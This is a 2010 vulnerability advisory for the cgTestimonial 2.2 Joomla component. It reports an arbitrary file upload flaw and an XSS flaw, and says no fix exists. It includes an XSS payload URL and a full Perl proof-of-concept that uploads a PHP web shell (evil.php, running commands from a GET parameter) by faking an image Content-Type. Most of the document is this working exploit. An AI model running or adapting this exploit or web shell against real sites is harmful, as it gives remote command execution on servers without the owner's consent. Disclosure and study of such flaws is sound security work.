cgTestimonial 2.2 Joomla Component Multiple Remote Vulnerabilities

 Name              cgTestimonial
 Vendor            http://www.cmsgalaxy.com
 Versions Affected 2.2

 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-08-06

X. INDEX

 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
 

I. ABOUT THE APPLICATION
________________________

cg_Testimonial   component   is   a  tool   for   adding
testimonial  by  the user from frontend and managing and
publishing testimonials from backend.
This  Joomla  extension  allows website user to submit a
testimonials  form  with  several  fields on one of your
site's  page  and enable  adding  testimonials by either
users or admin.


II. DESCRIPTION
_______________

Some parameters are not properly sanitised.The following
vulnerabilities can be exploited from guest users.


III. ANALYSIS
_____________

Summary:

 A) Multiple Arbitrary File Upload
 B) XSS
 

A) Multiple Arbitrary File Upload
_________________________________

The  usr_img  parameter  in cgtestimonial.php (frontend)
and in testimonial.php  (admin, without checks)  is  not
properly sanitised. A check  is executed on the content-
type HTTP field.


B) XSS
______

The url parameter in video.php is not properly sanitised
before being printed on screen.


IV. SAMPLE CODE
_______________

A) Multiple Arbitrary File Upload

http://poc.salvatorefresta.net/PoC-cgTestimonial2.2.pl.txt

B) XSS

http://site/path/components/com_cgtestimonial/video.php?url="><script>alert('xss');</script>


V. FIX
______

No fix.

################################ PoC-cgTestimonial2.2.pl ################################

#!/usr/bin/perl
#
# PoC - Remote PHP Shell Upload - cgTestimonial 2.2 Joomla Component
#
# Author: Salvatore Fresta aka Drosophila
# Email:  salvatorefresta@gmail.com
#
# Date: 06 August 2010
#
# http://target/path/components/com_cgtestimonial/user_images/filename?cmd=command
#

use IO::Socket;


$usage = "\ncgTestimonial 2.2 Remote PHP Shell Upload - (c) Salvatore Fresta\n".
         "http://www.salvatorefresta.net\n\n".
         "Usage: perl PoC-cgTestimonial.pl <hostname> <path>\n\n";

$#ARGV == 1 || die $usage;

my $host      = $ARGV[0];
my $path      = $ARGV[1];

my $stop      = 0;
my $rand      = "master".int(rand 150);
my $shell     = "<?php echo \"<pre>\"; system(\$_GET['cmd']); echo \"</pre>\"; ?>";
my $filename  = "evil.php";

my $code      = "--AaB03x\r\n".
                "Content-Disposition: form-data; name=\"usr_img\"; filename=\"$filename\"\r\n".
                "Content-Type: image/jpeg\r\n".
                "\r\n".
                "$shell\r\n".
                "--AaB03x--";

my $pkg       = "POST ".$path."index.php?option=com_cgtestimonial&task=submit HTTP/1.1\r\n".
                "Host: $host\r\n".
                "Content-Type: multipart/form-data; boundary=AaB03x\r\n".
                "Content-Length: " .length($code). "\r\n".
                "\r\n".
                $code;

my $socket = new IO::Socket::INET( Proto=> "tcp",
                                   PeerAddr=> $host,
                                   PeerPort=> "80"
                                  ) or die "\n[-] Unable to connect to $host\n\n";

print "\n[+] Connected\n";
print $socket $pkg;

$pkg = "GET ".$path."components/com_cgtestimonial/user_images/".$filename." HTTP/1.1\r\n".
       "Host: $host\r\n\r\n";

print $socket $pkg;

while ((my $rec = <$socket>) && $stop != 1) {
  if($rec !=~ /302 Found/) {
    $stop = 1;
  }
}

if($stop != 1) {
  print "[-] Shell not uploaded\n";
  close($socket);
  exit;
}

print "[+] Shell uploaded on ".$host.$path."components/com_cgtestimonial/user_images/".$filename."\n".
      "[+] Disconnected\n\n";

close($socket);